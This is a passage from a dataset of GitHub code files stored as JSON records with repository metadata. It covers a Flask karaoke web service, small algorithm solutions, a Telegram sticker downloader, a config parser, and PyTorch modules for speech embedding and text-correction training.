d.addinventory(product_id=d.product_id, design_id=d.did, var_id=v)\n flash(f'Added {d.pduct.product_name} DesNo {d.design_no}V{v}') \n return redirect(url_for('products.main'))\n\n return redirect(url_for('products.main'))\n\n\n\n\n \n\n \n\n \n\n","repo_name":"infected-dev/IMS","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42453091097","text":"class Solution:\n def findShortestSubArray(self, nums: List[int]) -> int:\n \n count = defaultdict(int)\n \n extent = defaultdict(lambda : 
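        # defaultdict with a [-1, -1] factory: extent[val] holds [first_index, last_index]\n        # for each value, so both bounds can be set on first sight without a key-existence check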
[-1,-1])\n \n maximum = 0\n \n for index, val in enumerate(nums):\n \n count[val]+=1\n if count[val]==1:\n extent[val][0]=index\n extent[val][1]=index\n maximum = max(maximum, count[val])\n \n ans = len(nums)\n for val in count:\n if count[val] == maximum :\n ans = min ( ans, (extent[val][1]- extent[val][0])+1)\n print(ans)\n return ans\n ","repo_name":"bekiTil/a2sv","sub_path":"0697-degree-of-an-array/0697-degree-of-an-array.py","file_name":"0697-degree-of-an-array.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"46851510098","text":"from pickle import PUT\nfrom flask import Flask, redirect,url_for,session,make_response\nfrom flask import request\nimport threading\nimport shutil\nimport glob\nimport os\nimport pytube\nimport json\nimport datetime\nimport time\nimport traceback\n\napp = Flask(__name__,static_url_path='',static_folder='web')\n\nimport karaoke\n\njobid = 1\nqueue = []\nconversions = []\nsongs = []\n\nglobal reftime\nreftime = datetime.datetime.now()\n\ndef mainPage():\n fl = open('index.html','r')\n rd = fl.read();\n fl.close();\n \n\n rd = rd.replace(\"[QUEUE]\",GetQueueList()) \n \n rd = rd.replace(\"[SONGS]\",GetSongList())\n \n return rd\n\ndef CheckForNextJob():\n nextwaiting = None\n busy = False\n for n in conversions:\n if n.progress == \"In Queue\":\n if nextwaiting is None:\n nextwaiting = n\n if n.progress != \"In Queue\" and n.progress != \"Complete\" and n.progress != \"Failed\":\n busy = True\n break\n \n if busy == False:\n print(\"Starting Conversion...\")\n if nextwaiting != None:\n nextwaiting.Start()\n\nclass ConversionJob:\n def __init__(self):\n self.id = None\n self.artist = \"\"\n self.title = \"\"\n self.progress = \"In Queue\"\n self.thread = None\n self.finalfile = \"\"\n \n def UpdateProgress(self,st):\n self.progress = st\n \n def runfunc(self):\n self.progress = \"Working\"\n try:\n fname = karaoke.Kareokise(self.title,self.artist,statusfunction=self.UpdateProgress)\n except:\n self.UpdateProgress(\"Failed\")\n traceback.print_exc()\n return\n \n shutil.move(fname,\"web/videos/\" + fname)\n shutil.move(\"thumbnail.jpg\",\"web/videos/\" + fname.replace(\"mp4\",\"jpg\"))\n try:\n shutil.move(\"ytvideo.ass\",\"web/videos/\" + fname.replace(\"mp4\",\"ass\"))\n except:\n pass\n try:\n shutil.move(fname.replace(\"mp4\",\"ogg\"),\"web/videos/\" + fname.replace(\"mp4\",\"ogg\"))\n except:\n pass\n self.finalfile = fname;\n self.progress = \"Complete\" \n ReloadSongs()\n CheckForNextJob()\n \n def Start(self):\n self.thread = threading.Thread(target=self.runfunc)\n self.thread.daemon = True\n self.thread.start()\n\nclass Song:\n def __init__(self,filename):\n self.artist = \"\"\n self.track = \"\"\n self.thumbnail = \"/videos/\" + filename.replace(\"mp4\",\"jpg\")\n self.status = \"Ready\"\n self.job = None\n self.path = filename\n self.version = 1\n self.age = 0\n \n global reftime\n \n nm = filename.replace(\".mp4\",\"\")\n bits = nm.split(\" - \")\n if len(bits) > 1:\n self.artist = bits[0].strip()\n self.track = bits[1].strip()\n else:\n self.track = bits[0]\n self.artist = \"Unknown\"\n \n if os.path.exists(\"web/videos/\" + filename.replace(\".mp4\",\".ogg\")):\n self.version = 2\n\n self.age = int((time.time() - os.path.getctime(\"web/videos/\" + filename)) / 86000) \n print(\"Checking On \" + \"web/videos/\" + filename.replace(\".mp4\",\".ogg\") + \" \" + str(self.age))\n \n def Get(self,nm):\n if nm == 'artist':\n return self.artist\n else:\n 
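            # For the 'new' sort key, fall through to the age buckets below:\n            # self.age holds the (approximate) days since the video file was created,\n            # mapped to a human-readable label; any other key returns the track title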
if nm == 'new':\n if self.age < 1:\n return \"Today\"\n if self.age < 2:\n return \"Yesterday\"\n if self.age < 7:\n return \"This Week\"\n if self.age < 14:\n return \"This Fortnight\"\n if self.age < 31:\n return \"This Month\"\n if self.age < 365:\n return \"This Year\" \n return \"Other\"\n else:\n return self.track\n \nsongs = []\n\ndef ReloadSongs():\n global songs\n songs = []\n #print(\"Loading Songs...\")\n for fl in glob.glob('web/videos/*.mp4'):\n #print(fl)\n songs.append(Song(os.path.basename(fl)))\n \nReloadSongs();\n\n@app.route(\"/searchsong\",methods = ['POST','GET'])\ndef songsearch():\n c = ConversionJob()\n print(str(request.form))\n c.title = request.form.get('track')\n c.artist = request.form.get('artist')\n conversions.append(c)\n \n print(\"Searching For \" + c.title + \" / \" + c.artist)\n \n CheckForNextJob()\n \n return redirect(\"/\") \n\ndef GetQueueList():\n queuecontent = \"\"\n for q in conversions:\n if q.progress != \"Complete\" and q.progress != \"Failed\":\n queuecontent += '

<div class=\"queue-item\"><span>' + q.progress + '</span> <span>' + q.title + '</span> <span>' + q.artist + '</span></div>'  # tags are reconstructed placeholders; the original markup was lost in extraction\n        #else:\n        #    queuecontent += '<div class=\"queue-item\"><span>PLAY</span> <span>' + q.title + '</span> <span>' + q.artist + '</span></div>

    ' \n \n return queuecontent\n\n@app.route(\"/queue\")\ndef queuerequest(): \n return GetQueueList()\n\ndef artistsort(a):\n return a.artist\n\ndef titlesort(a):\n return a.track\n\ndef newsort(a): \n return \"{:06d}\".format(a.age) + a.track\n\ndef GetSongList():\n \n sortorder = \"artist\"\n if request.args.get(\"sort\") is not None:\n sortorder = request.args.get(\"sort\") \n # session['sortorder'] = request.args.get(\"sort\") \n #else:\n #if 'sortorder' in session:\n #sortorder = session['sortorder']\n \n if sortorder == 'artist':\n songs.sort(key=artistsort) \n else:\n if sortorder == 'new':\n songs.sort(key=newsort)\n else:\n songs.sort(key=titlesort)\n\n lastfirst = None\n queuecontent = \"\"\n indx = -1\n anyitems = False\n counter = 0\n for q in songs:\n indx += 1\n \n counter += 1\n \n if lastfirst is None or lastfirst != q.Get(sortorder)[0]:\n if lastfirst is not None:\n queuecontent += ''\n counter = 0\n if sortorder == 'new': \n queuecontent += '
<div class=\"song-header\">' + q.Get(sortorder).upper() + '</div>';  # header tags are reconstructed placeholders; original markup lost in extraction\n            else:\n                queuecontent += '<div class=\"song-header\">' + q.Get(sortorder).upper()[0] + '</div>';\n            queuecontent += '<div class=\"song-row\">'\n            pass\n            #if lastfirst is not None:\n            #    queuecontent += \"</div>\"\n            #queuecontent += '<div class=\"song-header\">' + q.Get(sortorder).upper()[0] + '</div>';\n            #counter = 0\n        \n        if counter > 0 and counter % 4 == 0:\n            #if counter > 0:\n            #    queuecontent += \"\"\n            queuecontent += '</div><div class=\"song-row\">'  # start a new row every four songs\n        \n        anyitems = True\n        if q.status != \"Ready\":\n            queuecontent += ''  # per-song markup was lost in extraction\n        else:\n            queuecontent += ''  # per-song markup was lost in extraction\n        \n        lastfirst = q.Get(sortorder)[0]\n        \n    if anyitems == True:\n        queuecontent += \"</div>
    \"\n return queuecontent \n\n@app.route(\"/audiooffset\")\ndef audiooffset(): \n newoffset = request.cookies.get('laoffset')\n if newoffset is None:\n newoffset = 0\n else:\n newoffset = float(newoffset)\n \n change = request.args.get('change')\n if change is None:\n newoffset = 0\n else:\n newoffset += float(change)\n resp = make_response(str(newoffset))\n resp.set_cookie('laoffset',str(newoffset))\n return resp\n\n@app.route(\"/songs\")\ndef songrequest(): \n return GetSongList()\n \n@app.route(\"/play\")\ndef playback(): \n \n chosen = None\n\n global songs\n for s in songs:\n if request.args.get('video') in s.path:\n chosen = s\n break\n \n if s.version == 2:\n fl = open('player2.html','r')\n rd = fl.read();\n fl.close();\n else:\n fl = open('player.html','r')\n rd = fl.read();\n fl.close();\n \n\n vurl = request.args.get('video')\n offset = 0\n \n jsnfile = os.path.dirname(__file__) + \"/web/videos/\" + chosen.path.replace(\".mp4\",\".json\") \n if os.path.exists(jsnfile):\n fx = open(jsnfile,'r')\n content = fx.read()\n fx.close()\n md = json.loads(content)\n if 'lyricOffset' in md:\n if md['lyricOffset'] is not None:\n offset = -md['lyricOffset']\n \n laoffset = request.cookies.get('laoffset')\n if laoffset is None:\n laoffset = 0\n\n rd = rd.replace(\"[OFFSET]\",str(offset))\n rd = rd.replace(\"[LAOFFSET]\",str(laoffset))\n rd = rd.replace(\"[VIDEOFILE]\",vurl)\n rd = rd.replace(\"[VIDEOSCRIPT]\",vurl.replace(\"'\",\"\\\\'\"))\n rd = rd.replace(\"[VIDEOTITLE]\",request.args.get('video'))\n return rd\n\n@app.route(\"/findonline\")\ndef findonline(): \n \n title = request.args.get('track')\n artist = request.args.get('artist') \n\n song = karaoke.FindYTSong(title,artist)\n \n candidate = [] \n \n headers={ 'content-type':'application/json'} \n \n if song is None: \n return \"[]\",200,headers\n \n ob = {}\n ob['name'] = song.title\n ob['thumb'] = song.thumbnail_url\n candidate.append(ob)\n \n return json.dumps(candidate),200,headers\n \n@app.route(\"/timing\")\ndef timing():\n\n dta = request.args.get(\"video\") \n adjust = request.args.get(\"adjust\")\n timing = request.args.get(\"timing\")\n \n chosen = None\n\n global songs\n for s in songs:\n if request.args.get('video') in s.path:\n chosen = s\n break\n \n\n jsnfile = os.path.dirname(__file__) + \"/web/videos/\" + chosen.path.replace(\".mp4\",\".json\") \n if timing is not None:\n #Get file offset...\n md = {}\n if os.path.exists(jsnfile):\n fx = open(jsnfile,'r')\n content = fx.read()\n fx.close()\n md = json.loads(content) \n \n lyricfile = os.path.dirname(__file__) + \"/web/videos/\" + chosen.path.replace(\".mp4\",\".ass\")\n fl = open(lyricfile,'r')\n content = fl.read()\n fl.close()\n\n st = karaoke.GetAssLyricOffset(content)\n offset = float(timing) - st\n md['lyricOffset'] = offset\n \n print(str(timing) + \" vs \" + str(st))\n fx = open(jsnfile,'w') \n fx.write(json.dumps(md))\n fx.flush()\n fx.close()\n else:\n md = {}\n if os.path.exists(jsnfile):\n fx = open(jsnfile,'r')\n content = fx.read()\n fx.close()\n md = json.loads(content) \n else:\n md['lyricOffset'] = 0\n \n if 'lyricOffset' not in md:\n md['lyricOffset'] = 0\n \n md['lyricOffset'] += float(adjust)\n \n fx = open(jsnfile,'w') \n fx.write(json.dumps(md))\n fx.flush()\n fx.close() \n\n return \"/play/video=\" + dta + \"&timing=\" + timing\n #return redirect(\"/play/video=\" + dta + \"&timing=\" + timing) \n\n@app.route(\"/upgrade\")\ndef upgrade():\n\n dta = request.args.get(\"name\") \n bits = dta.split(\" - \")\n c = ConversionJob() \n c.title = 
bits[1]\n c.artist = bits[0]\n conversions.append(c)\n \n print(\"Searching For \" + c.title + \" / \" + c.artist)\n \n CheckForNextJob()\n \n return redirect(\"/\") \n\n@app.route(\"/\")\ndef hello_world(): \n \n return mainPage()","repo_name":"ignorantbliss/Flaskaraoke","sub_path":"karaokeservice.py","file_name":"karaokeservice.py","file_ext":"py","file_size_in_byte":12257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19223641913","text":"import xinstall.task as xtask\nimport importlib.resources as pkg_resources\nimport xinstall.resources as xresources\nimport shutil\n\n\nclass CopyResource(xtask.Task):\n \"\"\"Copy a resource to a given destination.\"\"\"\n\n def __init__(self, resource_name, destination_path):\n \"\"\"See `Task.__init__`\"\"\"\n super().__init__()\n self.resource_name = resource_name\n self.destination_path = xtask.parse_path(destination_path)\n\n def run(self):\n \"\"\"See `Task.run`\"\"\"\n if not pkg_resources.is_resource(xresources, self.resource_name):\n self._error(\"Resource '{}' does not exist\".format(self.resource_name))\n return False\n\n with pkg_resources.path(xresources, self.resource_name) as path:\n self._info(\n \"Copying resources '{}' to {}\".format(\n self.resource_name, self.destination_path\n )\n )\n\n try:\n shutil.copyfile(path, self.destination_path)\n except Exception:\n self._exception(\"An error occured during the copy\")\n return False\n\n return True\n","repo_name":"XanX3601/xinstall","sub_path":"xinstall/task/CopyResource.py","file_name":"CopyResource.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37474097472","text":"import sys\n\nN = int(sys.stdin.readline())\nanswer = set([])\n\nwhile N>0:\n inst = sys.stdin.readline().split()\n if inst[0] == 'all':\n answer = set(range(1,21))\n elif inst[0] == 'empty':\n answer = set([])\n else:\n num = int(inst[1])\n inst = inst[0]\n if inst == 'add':\n answer.add(num)\n elif inst == 'remove':\n if num in answer:\n answer.remove(num)\n elif inst == 'check':\n if num in answer:\n print(1)\n else:\n print(0)\n elif inst == 'toggle':\n if num in answer:\n answer.remove(num)\n else:\n answer.add(num)\n N -= 1","repo_name":"ujos89/1day1problem","sub_path":"baekjoon/algorithm/brute_force/b11723.py","file_name":"b11723.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3583543452","text":"import os\nfrom os.path import basename, splitext\n\n\nclass Downloader:\n\n def __init__(self, bot):\n self.bot = bot\n\n def download(self, sticker_name):\n sticker_set = self.bot.getStickerSet(sticker_name)\n sticker_json = {'name': sticker_set.name, 'title': sticker_set.title, 'stickers': [], 'animated':sticker_set.is_animated}\n\n if not os.path.exists(sticker_set.name):\n os.makedirs(sticker_set.name + \"/thumb\")\n\n have_thumb = False\n if sticker_set.thumb is not None:\n have_thumb = True\n file = self.bot.getFile(sticker_set.thumb.file_id)\n file.download(sticker_set.name + \"/thumb/\" + basename(file.file_path))\n sticker_json['thumb'] = sticker_set.name + \"/thumb/\" + basename(file.file_path)\n for st in sticker_set.stickers:\n file = self.bot.getFile(st.file_id)\n if not have_thumb:\n sticker_json['thumb'] = sticker_set.name + \"/\" + basename(file.file_path)\n file.download(sticker_set.name + \"/\" + basename(file.file_path))\n 
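            # Illustrative usage, kept as a comment so nothing runs inside this loop;\n            # the token and set name are placeholders, not values from this repo\n            # (assumes a python-telegram-bot Bot instance):\n            #     import telegram\n            #     bot = telegram.Bot(token=\"<YOUR_BOT_TOKEN>\")\n            #     meta = Downloader(bot).download(\"some_sticker_set\")\n            #     print(meta[\"title\"], len(meta[\"stickers\"]))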
sticker_json['stickers'].append(sticker_set.name + \"/\" + basename(file.file_path))\n\n return sticker_json\n","repo_name":"Z17-CU/ToDusStickerBot","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43739739742","text":"import os, sys\n\n\ndef get_config():\n \"\"\"Calls the load configuration method and checks for cml args\"\"\"\n if len(sys.argv) < 2:\n print(\"Missing Configuration Argument\")\n sys.exit(1)\n\n elif len(sys.argv) > 2:\n print(\"Too many arguments\")\n sys.exit(1)\n\n else:\n filename = sys.argv[1]\n\n #parse config\n config, message = parse_config(filename)\n\n #config invalid\n if config == -1:\n print(message)\n sys.exit(1)\n\n return config\n\n\ndef parse_config(filename):\n \"\"\"Parse a confiugration file and returns a dictionary of key value fields\"\"\"\n\n config_dict = {\n \"staticfiles\": None,\n \"cgibin\": None,\n \"port\": None,\n \"exec\": None\n }\n\n if not os.path.exists(filename):\n return -1, \"Unable To Load Configuration File\"\n\n try:\n with open(filename, \"r\") as f:\n content = f.readlines()\n\n for ln in content:\n try:\n key_pair = ln.strip().split(\"=\")\n\n #missing either key or value field\n if not key_pair[0] or not key_pair[1]:\n raise IndexError\n\n if key_pair[0] in config_dict:\n config_dict[key_pair[0]] = key_pair[1]\n #unknown key\n else:\n return -1, f\"Invalid key: {ln}\"\n\n except IndexError:\n return -1, f\"Missing field on line: {ln}\"\n\n # check that all fields have been set\n for key, val in config_dict.items():\n if val == None:\n return -1, f\"Missing Field From Configuration File\"\n\n return config_dict, None\n\n except OSError:\n return -1, \"Unable To Load Configuration File\"\n\n return -1, f\"Unspecified error parsing configuration file {filename}\"\n","repo_name":"Haeata-Ash/minimal_cgi_webserver","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13867792654","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n# Adapted from here : https://github.com/NVIDIA/NeMo/blob/b4040fb37350ae86b64a5f53be911371d7a3879d/nemo/collections/tts/modules/talknet.py\ndef merge(tensors, dim=0, value=0, dtype=None):\n \"\"\"Merges list of tensors into one.\"\"\"\n tensors = [tensor if isinstance(tensor, torch.Tensor) else torch.tensor(tensor) for tensor in tensors]\n dim = dim if dim != -1 else len(tensors[0].shape) - 1\n dtype = tensors[0].dtype if dtype is None else dtype\n max_len = max(tensor.shape[dim] for tensor in tensors)\n new_tensors = []\n for tensor in tensors:\n pad = (2 * len(tensor.shape)) * [0]\n pad[-2 * dim - 1] = max_len - tensor.shape[dim]\n new_tensors.append(F.pad(tensor, pad=pad, value=value))\n return torch.stack(new_tensors).to(dtype=dtype)\n\ndef repeat_merge(x, reps, pad):\n \"\"\"Repeats `x` values according to `reps` tensor and merges.\"\"\"\n return merge(\n tensors=[torch.repeat_interleave(text1, durs1) for text1, durs1 in zip(x, reps)], value=pad, dtype=x.dtype,\n )\nclass GaussianEmbedding(nn.Module):\n \"\"\"Gaussian embedding layer..\"\"\"\n\n EPS = 1e-6\n\n def __init__(\n self, idim, embed_dim=64, padding_idx=0, sigma_c=2.0, merge_blanks=False,\n ):\n super().__init__()\n\n self.embed = nn.Embedding(idim, embedding_dim=embed_dim, padding_idx=padding_idx)\n self.pad = 
0\n self.sigma_c = sigma_c\n self.merge_blanks = merge_blanks\n\n def forward(self, text, durs):\n \"\"\"See base class.\"\"\"\n # Fake padding\n text = F.pad(text, [0, 2, 0, 0], value=self.pad)\n durs = F.pad(durs, [0, 2, 0, 0], value=0)\n\n repeats = repeat_merge(text, durs, self.pad)\n print(repeats.shape)\n total_time = repeats.shape[-1]\n\n # Centroids: [B,T,N]\n c = (durs / 2.0) + F.pad(torch.cumsum(durs, dim=-1)[:, :-1], [1, 0, 0, 0], value=0)\n c = c.unsqueeze(1).repeat(1, total_time, 1)\n\n # Sigmas: [B,T,N]\n sigmas = durs\n sigmas = sigmas.float() / self.sigma_c\n sigmas = sigmas.unsqueeze(1).repeat(1, total_time, 1) + self.EPS\n assert c.shape == sigmas.shape\n\n # Times at indexes\n t = torch.arange(total_time, device=c.device).view(1, -1, 1).repeat(durs.shape[0], 1, durs.shape[-1]).float()\n t = t + 0.5\n\n ns = slice(None)\n if self.merge_blanks:\n ns = slice(1, None, 2)\n\n # Weights: [B,T,N]\n d = torch.distributions.normal.Normal(c, sigmas)\n w = d.log_prob(t).exp()[:, :, ns] # [B,T,N]\n pad_mask = (text == self.pad)[:, ns].unsqueeze(1).repeat(1, total_time, 1)\n w.masked_fill_(pad_mask, 0.0) # noqa\n w = w / (w.sum(-1, keepdim=True) + self.EPS)\n pad_mask = (repeats == self.pad).unsqueeze(-1).repeat(1, 1, text[:, ns].size(1)) # noqa\n w.masked_fill_(pad_mask, 0.0) # noqa\n pad_mask[:, :, :-1] = False\n w.masked_fill_(pad_mask, 1.0) # noqa\n\n # Embeds\n u = torch.bmm(w, self.embed(text)[:, ns, :]) # [B,T,E]\n\n return u\n \nif __name__ == \"__main__\":\n txt = torch.ones(1, 10).to(torch.long)\n dur = torch.tensor([1, 2, 3, 4, 5, 6, 7, 8, 9, 10]).unsqueeze(0).to(torch.long)\n print(txt.shape)\n print(dur.shape)\n embed = GaussianEmbedding()\n \n print(embed(txt, dur).shape)","repo_name":"rishikksh20/TalkNet2-pytorch","sub_path":"embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"35"} +{"seq_id":"8097966011","text":"import os\nimport sys\n\nBase_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(Base_DIR)\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\n# print(os.path.split(rootPath)[0])\nsys.path.append(os.path.split(rootPath)[0])\nimport argparse\nimport pandas as pd\nimport tqdm\nfrom datasets import Dataset\nimport torch.nn as nn\nfrom config.config import config\nimport torch\nfrom transformers.optimization import get_linear_schedule_with_warmup\nfrom torch.utils.data import DataLoader\nfrom transformers import BertTokenizer\nfrom torch.optim import AdamW\nfrom transformers.models.bert.modeling_bert import BertConfig\nfrom model.KozmoClassifier import KozmoClassifier\n\n\nclass Trainer:\n def __init__(self, config, epoch, lr=4e-4, gama=0.8, weight_decay=0.01,\n save_path=\"\",\n gradient_accumulation_steps=1, max_grad_norm=1.0):\n self.num_warmup = epoch / 10\n self.num_training = epoch\n self.max_grad_norm = max_grad_norm\n self.config = config\n self.pretrain_config = BertConfig.from_pretrained(self.config.bert_path)\n self.tokenizer = BertTokenizer.from_pretrained(self.config.bert_path, local_files_only=True)\n self.model = torch.load(self.config.normal_encoder_path).to(self.config.device)\n self.kozmo_decoder = KozmoClassifier(config).to(self.config.device)\n self.akn = torch.load(self.config.akn_path).to(self.config.device)\n self.gama = gama\n self.save_path = save_path\n self.device = self.config.device\n self.log_freq = 100\n self.gradient_accumulation_steps = 
gradient_accumulation_steps\n self.kc_param = self.get_param(self.kozmo_decoder, weight_decay)\n self.lm_param = self.get_param(self.model, weight_decay)\n self.lm_optimizer = AdamW(params=self.lm_param + self.kc_param, lr=lr)\n self.lm_scheduler = get_linear_schedule_with_warmup(self.lm_optimizer,\n num_warmup_steps=self.num_warmup,\n num_training_steps=self.num_training)\n\n def get_param(self, model, weight_decay):\n no_decay = ['bias', 'LayerNorm.Weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n 'weight_decay': weight_decay},\n {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n 'weight_decay': 0.0}\n ]\n\n return optimizer_grouped_parameters\n\n def save_model(self):\n torch.save(self.model, self.config.encoder_path)\n\n def save_semaspace(self):\n torch.save(self.kozmo_decoder, self.config.semaspace_path)\n\n def save(self):\n self.save_model()\n self.save_semaspace()\n\n def get_akn(self, pre, post):\n input_shape = pre.shape\n pre = pre.flatten()\n post = post.flatten()\n local_akn = self.akn[pre, post].reshape(input_shape)\n\n return local_akn\n\n def get_context_akn(self, input_ids, input_mask):\n max_act_len = torch.max(torch.sum(input_mask, dim=-1))\n act_dis_tags = torch.zeros(size=[input_ids.shape[0], input_ids.shape[1], input_ids.shape[1]],\n device=input_ids.device)\n dis_matrix = torch.zeros(size=[input_ids.shape[0], input_ids.shape[1], input_ids.shape[1]],\n device=input_ids.device, dtype=torch.float64)\n\n for shift in range(max_act_len):\n shift_tags = torch.zeros(size=[input_ids.shape[0], input_ids.shape[1], input_ids.shape[1]],\n device=input_ids.device) #\n if shift != 0:\n\n shift_tags[:, :-(shift), shift:] = torch.eye(input_ids.shape[1] - shift,\n device=input_ids.device).unsqueeze(0).repeat(\n input_ids.shape[0],\n 1, 1) #\n act_dis_tags += shift_tags #\n temp_akn = self.get_akn(input_ids[:, :-(shift)], input_ids[:, shift:])\n dis_matrix[shift_tags == 1] = torch.flatten(temp_akn, start_dim=0, end_dim=-1) #\n\n shift_tags = torch.zeros(size=[input_ids.shape[0], input_ids.shape[1], input_ids.shape[1]],\n device=input_ids.device) #\n shift_tags[:, shift:, :-(shift)] = torch.eye(input_ids.shape[1] - shift,\n device=input_ids.device).unsqueeze(0).repeat(\n input_ids.shape[0],\n 1, 1) #\n temp_akn = self.get_akn(input_ids[:, shift:], input_ids[:, :-(shift)])\n dis_matrix[shift_tags == 1] = torch.flatten(temp_akn, start_dim=0, end_dim=-1) #\n else:\n shift_tags = torch.eye(input_ids.shape[1],\n device=input_ids.device).unsqueeze(0).repeat(\n input_ids.shape[0],\n 1, 1) #\n act_dis_tags += shift_tags #\n temp_akn = self.get_akn(input_ids, input_ids)\n dis_matrix[shift_tags == 1] = torch.flatten(temp_akn, start_dim=0, end_dim=-1) #\n # for batch_num, batch in enumerate(dis_matrix):\n # dis_matrix[batch_num] = dis_matrix[input_mask[batch_num].usqueeze(0).repeat(input_mask.shape[1], 1)]\n mean_dis = torch.div(torch.sum(torch.sum(dis_matrix, dim=-1), dim=-1), torch.mul(torch.sum(input_mask, dim=-1), torch.sum(input_mask, dim=-1)))\n associative_score = torch.sigmoid(torch.div(dis_matrix, (mean_dis.unsqueeze(-1).unsqueeze(-1) + 1e-8))) - 0.5\n\n mean_as = torch.div(torch.sum(associative_score, dim=-1), torch.sum(input_mask, dim=-1).unsqueeze(-1).repeat(1, input_mask.shape[1]))\n mean_as = mean_as.unsqueeze(-1)\n associative_score = associative_score / (mean_as + 1e-8)\n associative_score = associative_score * input_mask.unsqueeze(1)\n\n return 
associative_score\n\n def loc_loss(self, input_ids, input_mask, dis_matrix, act_dis_tags):\n local_akn = self.get_context_akn(input_ids, input_mask)\n similarities = torch.cosine_similarity(dis_matrix[act_dis_tags == 1], local_akn[act_dis_tags == 1], dim=-1)\n return 1 - torch.mean(similarities)\n\n def reconstruction_loss(self, encoder_out, decoder_out):\n loss_fun = nn.L1Loss()\n loss = loss_fun(encoder_out, decoder_out)\n\n return loss\n\n def target_process(self, tgt_ids, tgt_mask, tgt_label):\n act_tgt_ids = tgt_ids * (tgt_label == 0) * tgt_mask\n act_tgt_mask = tgt_mask * (tgt_label == 0) * tgt_mask\n\n return act_tgt_ids, act_tgt_mask\n\n def ar_correction_loss(self, post_states, tgt_ids, input_mask):\n labels = tgt_ids[input_mask == 1]\n loss_fun = nn.CrossEntropyLoss()\n loss = loss_fun(post_states[input_mask > 0].view(-1, self.config.vocab_size),\n labels.long())\n decoder_ids = torch.argmax(post_states, dim=-1)\n total = torch.sum(input_mask > 0)\n correct = torch.sum(torch.eq(decoder_ids[input_mask > 0], labels))\n return loss, correct.item(), total.item()\n\n def correction_loss(self, decoder_out, prd_label):\n labels = prd_label[prd_label > 0]\n loss_fun = nn.CrossEntropyLoss()\n loss = loss_fun(decoder_out[prd_label > 0].view(-1, self.config.vocab_size),\n labels.long())\n\n decoder_ids = torch.argmax(decoder_out, dim=-1)\n total = torch.sum(prd_label > 0)\n correct = torch.sum(torch.eq(decoder_ids[prd_label > 0], labels))\n return loss, correct.item(), total.item()\n\n def do_correct(self, sentence):\n predict_label = self.evaluate(sentence)\n\n return predict_label\n\n def preprocess(self, input_sentence):\n tokenized_sentence = self.tokenizer(input_sentence, padding='max_length', max_length=128)\n input_text = torch.tensor(tokenized_sentence[\"input_ids\"], device=self.device).unsqueeze(0)\n input_mask = torch.tensor(tokenized_sentence[\"attention_mask\"], device=self.device).unsqueeze(0)\n return input_text, input_mask\n\n def evaluate(self, input_sentence):\n self.model.to(self.device)\n self.model.eval()\n self.kozmo_decoder.to(self.device)\n self.kozmo_decoder.eval()\n input_ids, input_mask = self.preprocess(input_sentence)\n encoder_out, _ = self.model(input_ids, input_mask)\n classifier_out, kozmo_dis = self.kozmo_decoder(encoder_out)\n decode_out = torch.argmax(classifier_out, dim=-1)\n return decode_out.item()\n\n def merge(self, kozmo_dis, input_mask):\n act_dis_tags = torch.zeros(size=[kozmo_dis.shape[0], kozmo_dis.shape[1], kozmo_dis.shape[1]],\n device=kozmo_dis.device)\n dis_matrix = torch.zeros(size=[kozmo_dis.shape[0], kozmo_dis.shape[1], kozmo_dis.shape[1]],\n device=kozmo_dis.device)\n max_act_len = torch.max(torch.sum(input_mask, dim=-1))\n for shift in range(max_act_len):\n shift_tags = torch.zeros(size=[kozmo_dis.shape[0], kozmo_dis.shape[1], kozmo_dis.shape[1]],\n device=kozmo_dis.device) #\n\n shift_tags[:, :-(shift + 1), shift + 1:] = torch.eye(kozmo_dis.shape[1] - shift - 1,\n device=kozmo_dis.device).unsqueeze(0).repeat(\n kozmo_dis.shape[0],\n 1, 1) #\n act_dis_tags += shift_tags #\n shift_dis = torch.cosine_similarity(kozmo_dis[:, shift + 1:], kozmo_dis[:, :-(shift + 1)], dim=-1)\n # shift_location = location[:, shift + 1:] - location[:, :-(shift + 1)] #\n # shift_dis = self.get_euclidean_dis(shift_location) #\n dis_matrix[shift_tags == 1] = torch.flatten(shift_dis, start_dim=0, end_dim=-1) #\n\n return dis_matrix, act_dis_tags\n\n def sighan_eval(self):\n current_count = 0\n correct_count = 0\n test_file = 
